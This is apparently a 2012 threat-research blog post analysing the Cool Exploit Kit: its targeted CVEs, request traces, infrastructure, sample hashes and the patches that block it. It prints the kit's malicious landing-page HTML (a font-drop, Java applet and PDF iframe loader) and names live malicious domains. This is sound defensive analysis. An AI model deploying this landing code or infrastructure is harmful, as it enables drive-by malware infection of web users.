2012-10-09 - Landscape

Cool Exploit Kit - A new Browser Exploit Pack on the Battlefield with a "Duqu" like font drop

Just for the  left panel Thumbnail :)
Stats page title


Sorry for the "read it live" post...the situation was moving while writing.

Few days ago i discovered that a bunch of reverse proxies that I was linking to same Blackhole Exploit Kit were in fact linked to 2 different Blackhole (quite surely operated by same team - I saw reverse proxies being redirected from one server to another one)

Trying to build a signature to know which server was behind a specific reverse, I found a new exploit kit.



Empty default stats

I fast noticed few things.
/r/pricelist.php is a PDF exploit.
/r/myadv.php is a Java pack.
/font.php is a Reveton PE.


I thought it would take weeks before it goes wild..but yesterday Malekal catched a landing spreading Reveton (blood.falawllp.info /r/l/town-proved.php ) and I immediately recognized that new EK. So  I hunted the malvertising and found another domain but same landing pointing to an already known Reverse Proxy.

Seems like it was time to take a deep look at this EK.

Small improvement, it looks like the "Sploit pack" is being checked by tools like Scan4you.




 When i first checked it, payload was not being pushed (all night long : no payload)

CVE-2012-4681 - IE - WinXP 32b
try.addsdice.com /r/l/town-proved.php <-- try.addsdice.com full of meaning no ?
try.addsdice.com /r/32size_font.eot <- ?
try.addsdice.com /r/pricelist.php
try.addsdice.com /r/myadv.php.pack.gz <- ?
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php
try.addsdice.com /r/l//r/f.php?k=1 <-- Vuln tracer for owner (seems guest does not have access to vuln break %)


CVE-2012-4681 - Firefox - WinXP 32b
try.addsdice.com /r/l/town-proved.php
try.addsdice.com /r/pricelist.php
try.addsdice.com /r/l//r/f.php?k=1

CVE-2012-0507 - IE - Win7 64b
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/64size_font.eot  <- ?
21x.xx.11x.1xx /r/pricelist.php
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx  /r/l//r/f.php?k=2

CVE-2012-1723 - IE - Win7 64b
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/64size_font.eot  <- ?
21x.xx.11x.1xx /r/pricelist.php
21x.xx.11x.1xx /favicon.ico
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx /r/f.php?k=4


MDAC (you should not be hurt):
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/32size_font.eot
21x.xx.11x.1xx /r/pricelist.php


Not up to date Win7 64b - IE -  (j7u7)
Note that there is NO payload on the EK right now, don't known how to be 100% sure the CVE is indeed active and that it's this CVE which is being used or a new thing...
try.addsdice.com /r/l/town-proved.php
try.addsdice.com /r/64size_font.eot
try.addsdice.com /r/pricelist.php
try.addsdice.com /favicon.ico
try.addsdice.com /r/f.php?k=4  <- ?
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php


town-proved.php with IE  contains :

<style>@font-face{font-family:'p1';src:url('http://BEEPBEEP/64size_font.eot');}.duqu{font-size:5px;line-height:normal;font-family:'p1';position:absolute;top:0px;left:0px;}</style></head><body onload='try{window.focus();}catch(e){}'><div class='duqu'>:)</div><applet archive='http://BEEPBEEP/myadv.php' code='ja.jh' width='468' height='200'></applet><br><br><iframe src='http://BEEPBEEP/pricelist.php' width='468' height='468'></iframe></body></html>

Source code of the landing pushed to IE on x64 windows


.duqu <- aouch, eactly what we could expect from a font drop !


Cool EK Tree


file.dll is a Reveton.
myadv.php (jar) - at least CVE-2012-4681, CVE-2012-507, CVE-2012-1723
0383be9bdb140f4588f5fb7c14d29fbd


CVE-2012-4681 spotted in jar file from Cool EK


filelist.php (pdf) - CVE-2010-0188
3bffc22ce0e67144c1b10da968f32f4c (2012-10-03) - http://wepawet.iseclab.org/view.php?hash=3bffc22ce0e67144c1b10da968f32f4c&t=1349739053&type=js

32size_font.eot : 050fbef5c814b2981fa61b7fc6820cbd
64size_font.eot : fada0b184b5372863a0c51f7fef5e2d0

How good is the "breaking" percentage ?
Guest stats on 1 thread (we can estimte that it's Reveton Infection via one Traffer)

Stats are moving and i can't get infected by that thread. Look like they are testing the EK in Traffic Analyser mode.

[EDIT - While Writing this post]

Around 10am French time got infected. As expected : Reveton.
So the Exploit Kit moved to production mode again.

Tried to run the landing on a CVE-2011-3402 positive computer with java 7u7 got infected (but  it's not Java)

Payload: f15df53d8cca428d2dbe924fe1dff733
Reveton for those who do not know (look botnets.fr/index.php/Reveton)

Run it on a Fully patched IE 8/Windows on Win 64 and java 7u7 No infection.


Tried to run the landing on a  "Not up to date Win7 x64"  positives computer without java : got infected


Payload : 106f1f7e3a24d1ae9af0efc0934a4dcb

Call Home from that Reveton payload.


Around 10:30 am : Malekal just found a new domain matching a known Reverse proxy that just switched from one BH EK server to this BH + Cool EK server.


I do not know what this font is about.
Is this a "new (?)" enabler for CVE-2012-4969. Is this another patched vuln from Internet Explorer ?
Am getting help to sort this out. Will update this post.

<edit1> got answer by Kaspersky Labs : it's CVE-2011-3402
so I s/CVE-2012-4969/CVE-2011-3402 this post...yes not ethical ;)
On my MDAC VM :
KB2676562 fix CVE-2011-3402
Removing this should allow exploitation - Work in progress.

</edit1>
<edit2>
After fighting hours with Updates and this EK (that was not Cool trust me) it seems that if you have at least one of this component installed, you are not vuln to the "Duqu-like" font drop :
-KB2676562 - CVE-2011-3402
-KB2744842 - CVE-2012-4969
-KB2718523 - CVE-2012-1893/CVE-2012-1890
-Windows Explorer 9.0
Downgrading a Windows 7x64 bits to see required "missing" KB to get owned
-= mean i removed this Patch.
Sound not so awful. I add all md5, VT Link etc...and my future edit should be the Libtiff path if i find time , adding a map of the distribution of Reverse proxies and maybe link to the detailed/technical explanation of this "Duqu-like" font drop, if someone work on it.
</edit2>
</edit4 15/10/12> Added the Cool EK PokeAMole Board

Here is it's distribution to play the Poke A Mole with the defense :
Cool EK Poke A Mole Board (Snapshot as I see it on 13/10/2012)
Explanation/Disclaimer at the End - Edit4
Too small ? : http://i.minus.com/ibbdTxd1LpqqHr.jpg




Credits for Components used in this model : http://pastebin.com/HsugYbhL

Explanation :

One server = One IP am aware of, on the 13/10/2012
One rectangle = /24 range
One color/server model  = One AS
One traffer = One thread am aware of (quite sure there is more)


Disclaimer : It's a schema focused on Cool EK "PokeAMole" architecture and threads. We do not describe what happen before binary is pushed on the EK and after infection events.
So things are in some way
- simplified : traffer often have the same kind of architecture (many IP hiding a main server (TDS, Fake adv server, etc...)), there is often traffic exchange plaform increasing the number of hop, traffer can sometime be feed by botnets and are often feed by emailing/Iframe on compromised server (so other actors/hats are in the loop, selling credentials, pushing iframe).
There is a live case where automation is so well done, that two (it seems) guys can handle many hats (gathering credentials, mass iframing/emailing, traffic, EK, pushing Zbot/Pony, and gathering credentials...Perpetual motion ;) ).
- complexified : for instance on AS57999, it would be really surprising if there is more than one server. In my opinion there the PokeAMole is just a game of IP/Routing configuration.
But from outside what you face is the same as what is represented here + domain name rotation.

 <edit4>


<edit3 without comment 12/10/12>
New parameters e and f are appearing in the payload URL :
</edit3>

<edit5 28/10/12> It seems now that you need a direct access to get the final payload via java payload since 25/10/2012

Here are files to check by yourself (always happy to have feedback ;) ):
Jar Before & After (OwnCloud via Goo.gl)
Fiddler Before & After (OwnCloud via Goo.gl)
</edit5>

Post Publication reading:
CVE-2011-3402 and Cool Exploit Kit - 2012-11-28 - yomuds - a bunch of random security bits!